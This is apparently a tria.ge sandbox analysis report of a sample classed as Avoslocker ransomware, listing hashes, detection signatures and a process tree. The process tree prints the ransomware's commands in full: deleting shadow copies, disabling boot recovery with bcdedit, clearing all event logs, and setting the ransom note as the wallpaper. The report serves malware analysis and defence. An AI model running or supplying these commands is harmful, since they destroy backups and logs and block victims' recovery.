Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

testing.exe

windows7-x64

10

testing.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    9s
  • max time network
    40s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/12/2024, 13:40 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    testing.exe

  • Size

    1.3MB

  • MD5

    af7a3708906e1ba0d51e43ce64e72b95

  • SHA1

    266af0471cdb6c1e7f682da899c4539abc52e46a

  • SHA256

    5277b6dfc55feb2002a93bc92a535360e29b738fb333db5f19be94d1c18b3e52

  • SHA512

    989fe2856a3c21d91b70bc2f207b34d05af22d35aaaec2315d991839939c916bd83e4f5849ec289b9b68799ac96b2b041354758c1af967a3717bcdcfe1994892

  • SSDEEP

    24576:cImw98okVgela0as5CqLVO7XJCjkD3N0HRAWRiDBN:qL5ljasaU2DBN

Score
10/10
avoslockerdefense_evasiondiscoveryevasionexecutionimpactransomware

Malware Config

Signatures

  • Avoslocker Ransomware

    Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.

    ransomwareavoslocker
  • Avoslocker family
    avoslocker
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Renames multiple (5057) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 60 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\testing.exe
    "C:\Users\Admin\AppData\Local\Temp\testing.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2520
    • C:\Users\Admin\AppData\Local\Temp\temp_executable.exe
      "C:\Users\Admin\AppData\Local\Temp\temp_executable.exe"
      2⤵
      • Executes dropped EXE
      • Enumerates connected drives
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2352
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c wmic shadowcopy delete /nointeractive
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3112
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic shadowcopy delete /nointeractive
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4556
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3816
        • C:\Windows\system32\vssadmin.exe
          vssadmin.exe Delete Shadows /All /Quiet
          4⤵
          • Interacts with shadow copies
          PID:4776
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c bcdedit /set {default} recoveryenabled No
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:972
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} recoveryenabled No
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:2760
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:556
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} bootstatuspolicy ignoreallfailures
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:2864
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4564
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3532
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "$a = [System.IO.File]::ReadAllText(\"F:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        PID:25936
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\928186502.png /f
          4⤵
            PID:24868
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
            4⤵
              PID:24552
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:38400
      • C:\Windows\system32\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\GET_YOUR_FILES_BACK.txt
        1⤵
        • Opens file in notepad (likely ransom note)
        PID:22992

      Network

      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dnsgoogle
      • flag-us
        DNS
        97.17.167.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        97.17.167.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        181.129.81.91.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        181.129.81.91.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        140.32.126.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        140.32.126.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        217.106.137.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        217.106.137.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        50.23.12.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        50.23.12.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        241.42.69.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        241.42.69.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        172.210.232.199.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        172.210.232.199.in-addr.arpa
        IN PTR
        Response
      No results found
      • 8.8.8.8:53
        8.8.8.8.in-addr.arpa
        dns
        66 B
         90 B
         1
        1

        DNS Request

        8.8.8.8.in-addr.arpa

      • 8.8.8.8:53
        97.17.167.52.in-addr.arpa
        dns
        71 B
         145 B
         1
        1

        DNS Request

        97.17.167.52.in-addr.arpa

      • 8.8.8.8:53
        181.129.81.91.in-addr.arpa
        dns
        72 B
         147 B
         1
        1

        DNS Request

        181.129.81.91.in-addr.arpa

      • 8.8.8.8:53
        140.32.126.40.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        140.32.126.40.in-addr.arpa

      • 8.8.8.8:53
        95.221.229.192.in-addr.arpa
        dns
        73 B
         144 B
         1
        1

        DNS Request

        95.221.229.192.in-addr.arpa

      • 8.8.8.8:53
        217.106.137.52.in-addr.arpa
        dns
        73 B
         147 B
         1
        1

        DNS Request

        217.106.137.52.in-addr.arpa

      • 8.8.8.8:53
        50.23.12.20.in-addr.arpa
        dns
        70 B
         156 B
         1
        1

        DNS Request

        50.23.12.20.in-addr.arpa

      • 8.8.8.8:53
        241.42.69.40.in-addr.arpa
        dns
        71 B
         145 B
         1
        1

        DNS Request

        241.42.69.40.in-addr.arpa

      • 8.8.8.8:53
        172.210.232.199.in-addr.arpa
        dns
        74 B
         128 B
         1
        1

        DNS Request

        172.210.232.199.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        6cf293cb4d80be23433eecf74ddb5503

        SHA1

        24fe4752df102c2ef492954d6b046cb5512ad408

        SHA256

        b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

        SHA512

        0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        c8861299853606fac3016094fcb76d2e

        SHA1

        8969dfdc86ceceb91bec0956f6a672a8606bc841

        SHA256

        07b966f55b6c7b2f633c7a4ace5c3cc0fc6f6dcbea8ff0da2210ed4a34c2cdf0

        SHA512

        841ca021eb2e9cb9831c2637f97739b0f2b35919b4e7eea3e39af808564f06b1d2175d618912603d1f61b364882c626799f68e069b13224d5db920ac7a267ef3

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dwn44r2j.3qx.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\temp_executable.exe
        Filesize

        807KB

        MD5

        e27b5291c8fb2dfdeb7f16bb6851df5e

        SHA1

        40207f83b601cd60905c1f807ac0889c80dfe33f

        SHA256

        ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f

        SHA512

        2ddbc50cd780ffbf73c354b9b437322eb49cb05bb6f287d54e7dcafb61dc4c4549e37ae2f972f3d240bfa7d2ca485b7583137f1bf038bc901f378cea0c305c6a

        Download Submit

      • F:\GET_YOUR_FILES_BACK.txt
        Filesize

        1011B

        MD5

        c92c2b70fb37f84aab38412ad9226aa8

        SHA1

        14f2e9a83285612d0a7b2c83b8f89bccfde6c154

        SHA256

        d64639e873c0873b469cd856d1ef4bce7dc14a80fac6fe2bed9d629f05acc77f

        SHA512

        04f9dcb3cd49909712535255b6eadd7fafcb2902bf1abd5a25e9bb5f5c4dc032611aec0a5b0ec89cd7dbc65276b935c54b906b391507d2e3e3aa65466b15f848

        Download Submit

      • memory/2520-7-0x00007FF676850000-0x00007FF67699D000-memory.dmp

        Filesize

        1.3MB

        Download

      • memory/3532-12359-0x00000147B2BC0000-0x00000147B2BE2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3532-21105-0x00000147B2BF0000-0x00000147B2E0C000-memory.dmp

        Filesize

        2.1MB

        Download

      • memory/3532-22709-0x00000147B2BF0000-0x00000147B2E0C000-memory.dmp

        Filesize

        2.1MB

        Download

      • memory/25936-22714-0x000001B270700000-0x000001B27091C000-memory.dmp

        Filesize

        2.1MB

        Download

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.